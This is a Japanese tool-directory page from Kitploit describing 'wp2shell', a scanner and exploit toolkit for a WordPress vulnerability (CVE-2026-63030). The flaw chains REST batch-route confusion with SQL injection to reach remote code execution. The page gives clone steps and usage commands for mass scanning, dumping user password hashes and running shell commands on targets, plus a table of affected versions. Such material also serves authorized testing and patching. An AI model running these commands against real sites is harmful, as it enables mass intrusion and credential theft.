Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wp2shell — wp2shell - WordPress CVE-2026-63030 エクスプロイト & スキャナー | Kitploit
ツール/GitHubGitHub/lutfifakee-project/wp2shell
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - WordPress CVE-2026-63030 エクスプロイト & スキャナー

リポジトリを見る
611ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔍 wp2shell - WordPress CVE-2026-63030 脆弱性スキャナ&エクスプロイト

⚡ CVE-2026-63030 (wp2shell) 向けの高速・リアルタイム脆弱性スキャナ&エクスプロイト


📌 概要

wp2shell は、WordPress の深刻な脆弱性 CVE-2026-63030 を検出・悪用するための包括的ツールキットです。この脆弱性により、認証されていない攻撃者が REST API のバッチルート混乱と SQL インジェクションを組み合わせてリモートコード実行を行うことができます。

🔍 CVE-2026-63030 とは?

CVE-2026-63030 (wp2shell) は、Adam Kues(Assetnote / Searchlight Cyber)によって発見された WordPress コアに影響する深刻な脆弱性です。以下の2つのバグを組み合わせたものです:

  1. GHSA-ff9f-jf42-662q - REST バッチルート混乱
  2. GHSA-fpp7-x2x2-2mjf - author__not_in SQL インジェクション

📊 影響を受けるバージョン



📦 クローンとセットアップ

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ 含まれるツール

1️⃣ wp2shell_scanner.py - 高速スキャナ

大規模な脆弱性検出のためのマルチスレッド・リアルタイムスキャナ。

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - INTO OUTFILE エクスプロイト

INTO OUTFILE RCE バリアントを実証します(MySQL の FILE 権限が必要)。

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - 単一ファイルエクスプロイト

フル機能を備えた、移植可能な単一ファイル版エクスプロイト。

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ 法的免責事項

重要:このツールは教育目的および許可を受けたテスト目的専用です。

  • 所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。
  • コンピュータシステムへの不正アクセスは違法です。
  • 開発者は、本ソフトウェアの誤用について一切の責任を負いません。 責任を持って倫理的に使用してください。
ツールをダウンロード
バージョン範囲
影響
ステータス
6.9.0 - 6.9.4🔴 RCE(クリティカル)❌ 脆弱
7.0.0 - 7.0.1🔴 RCE(クリティカル)❌ 脆弱
6.8.0 - 6.8.5🟡 SQLi(高)❌ 脆弱
6.9.5+ / 7.0.2+✅ パッチ済み✅ 安全